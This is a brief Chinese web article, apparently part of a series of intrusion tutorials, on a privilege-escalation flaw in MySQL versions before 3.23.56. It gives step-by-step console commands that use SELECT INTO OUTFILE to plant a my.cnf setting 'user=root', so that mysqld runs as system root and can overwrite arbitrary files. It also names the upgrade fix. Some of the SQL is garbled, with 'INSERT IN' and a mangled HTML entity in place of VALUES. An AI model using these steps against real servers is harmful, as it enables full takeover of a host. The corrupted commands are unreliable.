MySQL ROOT用户可得到系统ROOT权限

在 /etc 目录下有 my.cnf的情况下，通过以下操作，可让mysqld在重新启动之后以ROOT身份运行，

用mysql root连接并输入如下命令：

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack ＆#118alueS ('[mysqld]');
mysql>INSERT IN hack ＆#118alueS ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT

这样便在mysql的数据目录创建一个含有下面内容的文件my.cnf

[mysqld]
user=root

在mysql重起之后，此文件将覆盖 /etc/my.cnf的内容，mysqld将以root身份运行，这意味着你也同时拥有系统的root权限了，如通过使用创建适当形式的数据表并通过 INTO OUTFILE 创建或改写目标主机上任意文件等

说明：

尽管此漏洞需要获得MySQL的root密码，这事实上是大多数系统root才掌握的密码。不过因为此密码通常比系统的root密码更容易得到，如果入侵者获得此密码，利用此漏洞，这个系统将彻底被控制。特别在mysql <= 3.23.53 的情况下，得到mysql的root的exploit已经早就能在internet上找到了。因此这个漏洞具有相当大的危险性

有此漏洞版本：小于 MySQL 3.23.56 的所有版本

解决方法：升级到 MySQL 3.23.56

你看的懂的入侵方法（NT篇）：【上一篇】
扫描到的端口到底有什么用?：【下一篇】